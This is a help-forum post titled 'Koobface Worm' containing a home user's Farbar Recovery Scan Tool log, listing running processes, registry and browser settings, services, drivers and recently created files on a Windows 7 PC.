Koobface Worm

sheri brennan

Dec 13, 2017
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 13-12-2017
Ran by sheri (administrator) on SHERI-PC (13-12-2017 07:43:10)
Running from C:\Users\sheri\Desktop
Loaded Profiles: sheri (Available Profiles: sheri)
Platform: Microsoft Windows 7 Home Premium Service Pack 1 (X86) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: FRST Tutorial - How to use Farbar Recovery Scan Tool - Malware Removal Guides and Tutorials

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(IObit) C:\Program Files\IObit\Advanced SystemCare\ASCService.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Adobe Systems, Incorporated) C:\Program Files\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\VS7DEBUG\MDM.EXE
(Reimage®) C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe
(IObit) C:\Program Files\IObit\Smart Defrag\SmartDefrag.exe
(IObit) C:\Program Files\IObit\Advanced SystemCare\Monitor.exe
(Reimage®) C:\Program Files\Reimage\Reimage Protector\ReiSystem.exe
(Microsoft Corporation) C:\Windows\System32\printfilterpipelinesvc.exe
(Google Inc.) C:\Program Files\Google\Update\1.3.33.7\GoogleCrashHandler.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(IObit) C:\Program Files\IObit\IObit Uninstaller\UninstallMonitor.exe
(IObit) C:\Program Files\IObit\Advanced SystemCare\ASCTray.exe
(IObit) C:\Program Files\IObit\Advanced SystemCare\ASC.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [] => [X]
HKU\S-1-5-21-3948143356-924845713-1080013463-1000\...\Policies\Explorer: [NolowDiskSpaceChecks] 1
Lsa: [Notification Packages] scecli C:\Program Files\TrueKey\McAfeeTrueKeyPasswordFilter

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 205.171.2.25
Tcpip\..\Interfaces\{FB7B3318-7CD1-4E4D-887C-1D71C5647D83}: [DhcpNameServer] 192.168.0.1 205.171.2.25

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_iobitfs_17_37&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzutDtDtBtCzyyB0CtA0EtD0Azy0FtDtC0FtN0D0Tzu0StBtDzzyDtN1L2XzutAtFtBzytFtCtDyEtFzytAtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StBtD0F0CyE0DyD0DtGyC0D0ByDtGyCtDzy0AtGyB0AtDtCtGyDyBtD0FyE0FyC0FtAyDyDtB2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyC0Dzy0FtAyCyCyDtGtC0Fzz0EtGyEyD0B0DtG0AtB0AtAtGtBtAtAzzyEzztBtAzy0DyE0D2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyEtBzyzy%26cr%3D113564250%26a%3Dwncy_iobitfs_17_37%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_iobitfs_17_37&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzutDtDtBtCzyyB0CtA0EtD0Azy0FtDtC0FtN0D0Tzu0StBtDzzyDtN1L2XzutAtFtBzytFtCtDyEtFzytAtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StBtD0F0CyE0DyD0DtGyC0D0ByDtGyCtDzy0AtGyB0AtDtCtGyDyBtD0FyE0FyC0FtAyDyDtB2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyC0Dzy0FtAyCyCyDtGtC0Fzz0EtGyEyD0B0DtG0AtB0AtAtGtBtAtAzzyEzztBtAzy0DyE0D2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyEtBzyzy%26cr%3D113564250%26a%3Dwncy_iobitfs_17_37%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium&p={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_iobitfs_17_37&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzutDtDtBtCzyyB0CtA0EtD0Azy0FtDtC0FtN0D0Tzu0StBtDzzyDtN1L2XzutAtFtBzytFtCtDyEtFzytAtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StBtD0F0CyE0DyD0DtGyC0D0ByDtGyCtDzy0AtGyB0AtDtCtGyDyBtD0FyE0FyC0FtAyDyDtB2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyC0Dzy0FtAyCyCyDtGtC0Fzz0EtGyEyD0B0DtG0AtB0AtAtGtBtAtAzzyEzztBtAzy0DyE0D2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyEtBzyzy%26cr%3D113564250%26a%3Dwncy_iobitfs_17_37%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3948143356-924845713-1080013463-1000 -> {3BD44F0E-0596-4008-AEE0-45D47E3A8F0E} URL =
SearchScopes: HKU\S-1-5-21-3948143356-924845713-1080013463-1000 -> {9928BBD0-3FDA-4CC5-BC53-EB3AD3D31954} URL = hxxps://search.yahoo.com/search?p={searchTerms}&intl=us&fr=yset_ie_syc_oracle&type=orcl_default&partnerexternal-oracle=external-oracle
BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> C:\Program Files\IObit\IObit Uninstaller\UninstallExplorer.dll [2016-05-23] (IObit)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_151\bin\ssv.dll [2017-11-26] (Oracle Corporation)
BHO: VIPRE Search Guard Helper -> {963C8283-AE7F-4AA6-9B3B-847A8FC62C5E} -> C:\Program Files\VIPRE\VSGN.dll => No File
BHO: IObit Surfing Protection -> {BA0C978D-D909-49B6-AFE2-8BDE245DC7E6} -> C:\Program Files\IObit\Advanced SystemCare\Surfing Protection\BrowerProtect\ASCPlugin_Protection.dll [2017-08-04] (IObit)
BHO: IObit Ads Removal -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\IObit\Advanced SystemCare\Surfing Protection\Adblock\Adblock.dll [2016-06-23] (IObit)
Toolbar: HKLM - VIPRE Search Guard Toolbar - {A924C17A-5E94-4E02-BED5-49720BA6F7FA} - No File
Toolbar: HKU\S-1-5-21-3948143356-924845713-1080013463-1000 -> No Name - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - No File
Handler: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - C:\Program Files\Common Files\Microsoft Shared\Information Retrieval\MSITSS.DLL [2000-04-19] (Microsoft Corporation)
Handler: vipresg - {47BE2E5B-703B-444F-ABD3-05717D2191C6} - C:\Program Files\VIPRE\VSGN.dll No File
Handler: WSWSVCUchrome - No CLSID Value -
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF HKLM\...\Firefox\Extensions: [WSVCU@Wondershare.com] - C:\ProgramData\Wondershare\Video Converter Ultimate\WSVCU@Wondershare.com_xpi
FF Extension: (Wondershare Video Converter Ultimate) - C:\ProgramData\Wondershare\Video Converter Ultimate\WSVCU@Wondershare.com_xpi [2017-04-14] [Legacy]
FF Plugin: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw.dll [2010-08-17] (Adobe Systems, Inc.)
FF Plugin: @java.com/DTPlugin,version=11.151.2 -> C:\Program Files\Java\jre1.8.0_151\bin\dtplugin\npDeployJava1.dll [2017-11-26] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.151.2 -> C:\Program Files\Java\jre1.8.0_151\bin\plugin2\npjp2.dll [2017-11-26] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-12-12] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-12-12] (Google Inc.)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2017-09-20] (Adobe Systems)
FF Plugin HKU\S-1-5-21-3948143356-924845713-1080013463-1000: @rocketlife.com/RocketLife Secure Plug-In Layer;version=1.0.5 -> C:\Users\sheri\AppData\Roaming\Visan\plugins\npRLSecurePluginLayer.dll [2011-11-15] (RocketLife, LLP)

Chrome:
=======
CHR HomePage: Default -> hxxp://yahoo.com/
CHR StartupUrls: Default -> "hxxp://yahoo.com/"
CHR NewTab: Default -> Active:"chrome-extension://jccfgghhbihbhomnlnadpjhkhmmboanj/newtab.html"
CHR DefaultSearchURL: Default -> hxxps://search.yahoo.com/search?ei={inputEncoding}&fr=crmas&p={searchTerms}
CHR DefaultSearchKeyword: Default -> yahoo.com
CHR DefaultSuggestURL: Default -> hxxps://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command={searchTerms}
CHR Profile: C:\Users\sheri\AppData\Local\Google\Chrome\User Data\Default [2017-12-13]
CHR Extension: (Google Drive) - C:\Users\sheri\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-02-04]
CHR Extension: (Adblock Plus) - C:\Users\sheri\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2017-09-26]
CHR Extension: (Google Docs Offline) - C:\Users\sheri\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-10-19]
CHR Extension: (Yahoo Homepage) - C:\Users\sheri\AppData\Local\Google\Chrome\User Data\Default\Extensions\jccfgghhbihbhomnlnadpjhkhmmboanj [2017-07-20]
CHR Extension: (Ghostery) - C:\Users\sheri\AppData\Local\Google\Chrome\User Data\Default\Extensions\mlomiejdfkolichcflejclcbmpeaniij [2017-12-07]
CHR Extension: (Chrome Web Store Payments) - C:\Users\sheri\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-22]
CHR Extension: (Chrome Media Router) - C:\Users\sheri\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-11-16]
CHR HKU\S-1-5-21-3948143356-924845713-1080013463-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-3948143356-924845713-1080013463-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeUpdateService; C:\Program Files\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [817760 2017-09-20] (Adobe Systems Incorporated)
R2 AdvancedSystemCareService11; C:\Program Files\IObit\Advanced SystemCare\ASCService.exe [1053984 2017-11-01] (IObit)
R2 AGSService; C:\Program Files\Common Files\Adobe\AdobeGCClient\AGSService.exe [2257016 2017-08-23] (Adobe Systems, Incorporated)
S2 IObitUnSvr; C:\Program Files\IObit\IObit Uninstaller\IUService.exe [360736 2016-10-28] (IObit)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [103696 2016-11-14] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [280864 2016-11-14] (Microsoft Corporation)
R2 ReimageRealTimeProtector; C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [6959472 2017-09-10] (Reimage®)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2013-05-26] (Microsoft Corporation)
S3 WsAppService; C:\Program Files\Wondershare\WAF\2.1.6.0\WsAppService.exe [388608 2016-01-28] (Wondershare) [File not signed]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 AmUStor; C:\Windows\System32\drivers\AmUStor.SYS [75416 2017-02-04] (Alcor Micro, Corp.)
R3 cpuz143; C:\Windows\temp\cpuz143\cpuz143_x32.sys [49472 2017-12-13] (CPUID)
S3 dg_ssudbus; C:\Windows\System32\DRIVERS\ssudbus.sys [109456 2017-05-18] (Samsung Electronics Co., Ltd.)
R1 HWiNFO32; C:\Windows\system32\drivers\HWiNFO32.SYS [23840 2017-02-04] (REALiX(tm))
R3 iobit_monitor_server; C:\Program Files\IObit\Advanced SystemCare\drivers\Monitor_x86.sys [15216 2016-11-23] (IObit)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [252808 2016-08-25] (Microsoft Corporation)
R1 MpKsl6db6c477; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{EF1A88B5-630F-4A4C-8A08-67EBC5BF1FDB}\MpKsl6db6c477.sys [49504 2017-12-13] (Microsoft Corporation)
R0 SmartDefragDriver; C:\Windows\System32\Drivers\SmartDefragDriver.sys [18800 2016-03-22] (IObit)
S3 ssudmdm; C:\Windows\System32\DRIVERS\ssudmdm.sys [147344 2017-05-18] (Samsung Electronics Co., Ltd.)
S3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [23040 2017-08-30] (The OpenVPN Project) [File not signed]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-12-13 07:42 - 2017-12-13 07:42 - 001752576 _____ (Farbar) C:\Users\sheri\Desktop\FRST.exe
2017-12-13 07:39 - 2017-12-13 07:44 - 000013747 _____ C:\Users\sheri\Desktop\FRST.txt
2017-12-13 07:28 - 2017-12-13 07:35 - 000007259 _____ C:\Users\sheri\Downloads\FRST.txt
2017-12-13 07:27 - 2017-12-13 07:28 - 000000000 ____D C:\FRST
2017-12-13 07:19 - 2017-12-13 07:19 - 001336829 _____ C:\Users\sheri\Downloads\Autoruns (1).zip
2017-12-13 07:14 - 2017-12-13 07:14 - 001329536 _____ (Microsoft Corporation) C:\Users\sheri\Downloads\WindowsXP-KB905474-ENU-x86-Standalone (1).exe
2017-12-13 07:12 - 2017-12-13 07:12 - 001329536 _____ (Microsoft Corporation) C:\Users\sheri\Downloads\WindowsXP-KB905474-ENU-x86-Standalone.exe
2017-12-13 06:37 - 2017-12-13 06:37 - 000000000 ____D C:\_Backup
2017-12-13 06:24 - 2017-12-13 06:24 - 000001284 _____ C:\Windows\system32\ServiceConfig.xml
2017-12-13 06:02 - 2017-12-13 06:03 - 000000000 ____D C:\ProgramData\Reimage Protector
2017-12-13 06:02 - 2017-12-13 06:02 - 005154304 _____ C:\Users\sheri\Downloads\WindowsDefender.msi
2017-12-13 06:02 - 2017-12-13 06:02 - 000002062 _____ C:\Users\Public\Desktop\PC Scan & Repair by Reimage.lnk
2017-12-13 06:02 - 2017-12-13 06:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Reimage Repair
2017-12-13 06:01 - 2017-12-13 06:02 - 000000000 ____D C:\Program Files\Reimage
2017-12-13 06:00 - 2017-12-13 06:03 - 000000000 ____D C:\rei
2017-12-13 05:59 - 2017-12-13 06:03 - 000000140 _____ C:\Windows\Reimage.ini
2017-12-13 05:59 - 2017-12-13 05:59 - 000605424 _____ (Reimage) C:\Users\sheri\Downloads\ReimageRepair (1).exe
2017-12-13 05:58 - 2017-12-13 05:59 - 000605424 _____ (Reimage) C:\Users\sheri\Downloads\ReimageRepair.exe
2017-12-13 05:44 - 2017-12-13 05:44 - 000892944 _____ (Microsoft Corporation) C:\Users\sheri\Downloads\mssstool32.exe
2017-12-13 04:38 - 2017-12-13 05:23 - 000000000 ___HD C:\Users\Public\Documents\AdobeGC
2017-12-13 02:07 - 2017-11-14 16:36 - 000347336 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2017-12-13 02:07 - 2017-11-13 17:37 - 013679616 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2017-12-13 02:07 - 2017-11-13 17:15 - 000416256 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2017-12-13 02:07 - 2017-11-13 17:15 - 000279040 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2017-12-13 02:07 - 2017-11-13 17:15 - 000076288 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2017-12-13 02:07 - 2017-11-13 17:10 - 020269056 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2017-12-13 02:07 - 2017-11-13 16:32 - 000499200 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2017-12-13 02:07 - 2017-11-13 16:31 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2017-12-13 02:07 - 2017-11-07 12:56 - 002724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2017-12-13 02:07 - 2017-11-07 12:56 - 000004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2017-12-13 02:07 - 2017-11-07 12:46 - 000341504 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2017-12-13 02:07 - 2017-11-07 12:46 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2017-12-13 02:07 - 2017-11-07 12:46 - 000047616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2017-12-13 02:07 - 2017-11-07 12:44 - 002293760 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2017-12-13 02:07 - 2017-11-07 12:41 - 000047104 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2017-12-13 02:07 - 2017-11-07 12:41 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2017-12-13 02:07 - 2017-11-07 12:40 - 000476160 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2017-12-13 02:07 - 2017-11-07 12:39 - 000662016 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2017-12-13 02:07 - 2017-11-07 12:39 - 000104960 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2017-12-13 02:07 - 2017-11-07 12:38 - 000620032 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2017-12-13 02:07 - 2017-11-07 12:38 - 000115712 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2017-12-13 02:07 - 2017-11-07 12:35 - 000667648 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2017-12-13 02:07 - 2017-11-07 12:29 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2017-12-13 02:07 - 2017-11-07 12:28 - 000091136 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2017-12-13 02:07 - 2017-11-07 12:28 - 000073216 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2017-12-13 02:07 - 2017-11-07 12:27 - 004509696 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2017-12-13 02:07 - 2017-11-07 12:26 - 000168960 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2017-12-13 02:07 - 2017-11-07 12:24 - 000130048 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2017-12-13 02:07 - 2017-11-07 12:19 - 000230400 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2017-12-13 02:07 - 2017-11-07 12:18 - 000694272 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2017-12-13 02:07 - 2017-11-07 12:18 - 000690688 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2017-12-13 02:07 - 2017-11-07 12:17 - 002058752 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2017-12-13 02:07 - 2017-11-07 12:17 - 001155072 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2017-12-13 02:07 - 2017-11-07 12:04 - 002767872 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2017-12-13 02:07 - 2017-11-07 12:01 - 001313280 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2017-12-13 02:07 - 2017-11-07 11:58 - 000710144 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2017-12-13 02:07 - 2017-11-07 08:13 - 000002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2017-12-13 02:07 - 2017-11-04 07:10 - 000158720 _____ (Microsoft Corporation) C:\Windows\system32\itircl.dll
2017-12-13 02:07 - 2017-11-04 07:10 - 000142336 _____ (Microsoft Corporation) C:\Windows\system32\itss.dll
2017-12-13 02:07 - 2017-11-02 07:11 - 000271360 _____ (Microsoft Corporation) C:\Windows\system32\iprtrmgr.dll
2017-12-13 02:07 - 2017-11-02 07:11 - 000115200 _____ (Microsoft Corporation) C:\Windows\system32\rtm.dll
2017-12-13 02:07 - 2017-11-02 07:11 - 000075264 _____ (Microsoft Corporation) C:\Windows\system32\mprdim.dll
2017-12-13 02:07 - 2017-11-02 06:56 - 000008192 _____ (Microsoft Corporation) C:\Windows\system32\iprtprio.dll
2017-12-12 17:21 - 2017-12-12 17:21 - 001997168 _____ C:\Users\sheri\Downloads\wrar550.exe
2017-12-12 17:16 - 2017-12-12 17:19 - 019204520 _____ (IObit ) C:\Users\sheri\Downloads\driver_booster_setup.exe
2017-12-12 08:29 - 2017-12-12 08:29 - 000000000 ____D C:\Users\sheri\AppData\Local\IsolatedStorage
2017-12-12 08:29 - 2017-12-12 08:29 - 000000000 _____ C:\Windows\system32\SBRC.dat
2017-12-12 08:25 - 2017-12-12 08:44 - 000001945 _____ C:\Windows\epplauncher.mif
2017-12-12 08:23 - 2017-12-12 08:43 - 000002093 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Security Essentials.lnk
2017-12-12 08:23 - 2017-12-12 08:43 - 000000000 ____D C:\Program Files\Microsoft Security Client
2017-12-12 08:15 - 2017-12-12 08:15 - 000002864 _____ C:\Windows\system32\VipreEdgeProtectionOff.ini
2017-12-12 08:15 - 2017-05-12 10:02 - 000030840 _____ (ThreatTrack Security Inc.) C:\Windows\system32\Drivers\WebExaminer.sys
2017-12-12 08:14 - 2017-12-12 08:14 - 000000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_avchv_01009.Wdf
2017-12-12 08:13 - 2017-12-12 08:13 - 000000000 ____D C:\ProgramData\Downloaded Installations
2017-12-12 08:12 - 2017-12-13 06:25 - 000000000 ____D C:\Program Files\VIPRE
2017-12-12 08:12 - 2017-12-12 08:12 - 006072216 _____ (ThreatTrack Security, Inc) C:\Users\sheri\Downloads\vipre-advanced-security-trial.exe
2017-12-12 08:12 - 2017-12-12 08:12 - 000000000 ____D C:\Users\sheri\AppData\Local\VIPRE
2017-12-12 07:39 - 2017-12-12 07:39 - 001306150 _____ C:\Users\sheri\Downloads\Autoruns.zip
2017-12-12 07:00 - 2017-12-13 07:00 - 000000052 _____ C:\Users\sheri\AppData\Local\bpDLTbpDLT
2017-12-11 16:53 - 2017-12-11 16:53 - 000822328 _____ (Roblox Corporation) C:\Users\sheri\Downloads\RobloxPlayerLauncher.exe
2017-12-07 15:53 - 2017-12-07 15:53 - 000011138 _____ C:\Users\sheri\AppData\Local\recently-used.xbel
2017-12-07 15:38 - 2017-12-07 15:53 - 001444901 _____ C:\Users\sheri\Documents\1-800.xcf
2017-12-04 14:45 - 2017-12-04 14:45 - 000829030 _____ C:\Users\sheri\Downloads\candy-crushers.pdf
2017-12-04 14:44 - 2017-12-04 14:44 - 000377747 _____ C:\Users\sheri\Downloads\draw-clocks.pdf
2017-12-04 14:42 - 2017-12-04 14:42 - 000412364 _____ C:\Users\sheri\Downloads\read-the-time.pdf
2017-12-04 10:10 - 2017-12-07 15:53 - 000000000 ____D C:\Users\sheri\AppData\Local\gtk-2.0
2017-12-04 10:10 - 2017-12-04 10:10 - 000000000 ____D C:\Users\sheri\.thumbnails
2017-12-04 10:09 - 2017-12-04 12:27 - 000000000 ____D C:\Users\sheri\Desktop\New folder
2017-12-04 10:08 - 2017-12-07 15:53 - 000000000 ____D C:\Users\sheri\.gimp-2.8
2017-12-04 10:08 - 2017-12-04 10:08 - 000000000 ____D C:\Users\sheri\AppData\Local\gegl-0.2
2017-12-04 10:08 - 2017-12-04 10:08 - 000000000 ____D C:\Users\sheri\AppData\Local\fontconfig
2017-12-03 18:39 - 2017-12-03 20:28 - 3319478272 _____ C:\Users\sheri\Desktop\pcriver.com-Win_7_Ult_64Bit.iso
2017-12-01 20:23 - 2017-12-01 20:23 - 002402816 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2017-12-01 20:23 - 2017-12-01 20:23 - 000953344 _____ (Microsoft Corporation) C:\Windows\system32\gpedit.dll
2017-12-01 20:23 - 2017-12-01 20:23 - 000247808 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdbss.sys
2017-11-27 15:58 - 2017-11-27 15:58 - 000001922 _____ C:\Users\Public\Desktop\HP Print and Scan Doctor.lnk
2017-11-27 13:06 - 2017-12-07 15:15 - 000000000 ____D C:\Users\sheri\Desktop\Mistryee
2017-11-26 15:14 - 2015-07-16 11:12 - 006131200 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2017-11-26 15:14 - 2015-07-16 11:12 - 000856064 _____ (Microsoft Corporation) C:\Windows\system32\rdvidcrl.dll
2017-11-26 15:14 - 2015-07-16 11:12 - 000053248 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll
2017-11-26 15:14 - 2015-07-16 07:14 - 000355840 _____ (Microsoft Corporation) C:\Windows\system32\wksprt.exe
2017-11-26 15:14 - 2014-12-11 09:47 - 000074240 _____ (Microsoft Corporation) C:\Windows\system32\TSWbPrxy.exe
2017-11-26 08:41 - 2017-12-12 06:11 - 000002168 _____ C:\Users\Public\Desktop\Advanced SystemCare 11.lnk
2017-11-26 08:28 - 2013-10-01 15:45 - 000032256 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbGDCoInstaller.dll
2017-11-26 08:27 - 2013-10-01 16:42 - 000049152 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\TsUsbFlt.sys
2017-11-26 08:27 - 2013-10-01 16:32 - 000012800 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbRedirectionGroupPolicyControl.exe
2017-11-26 08:27 - 2013-10-01 16:30 - 000014336 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbRedirectionGroupPolicyExtension.dll
2017-11-26 08:27 - 2013-10-01 16:14 - 000050176 _____ (Microsoft Corporation) C:\Windows\system32\MsRdpWebAccess.dll
2017-11-26 08:27 - 2013-10-01 16:14 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\wksprtPS.dll
2017-11-26 08:27 - 2013-10-01 14:34 - 001068544 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2017-11-26 08:20 - 2017-11-26 08:20 - 000001204 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio Installer.lnk
2017-11-26 08:20 - 2017-11-26 08:20 - 000000000 ____D C:\Users\sheri\AppData\Roaming\vstelemetry
2017-11-26 08:20 - 2017-11-26 08:20 - 000000000 ____D C:\Users\sheri\AppData\Roaming\Visual Studio Setup
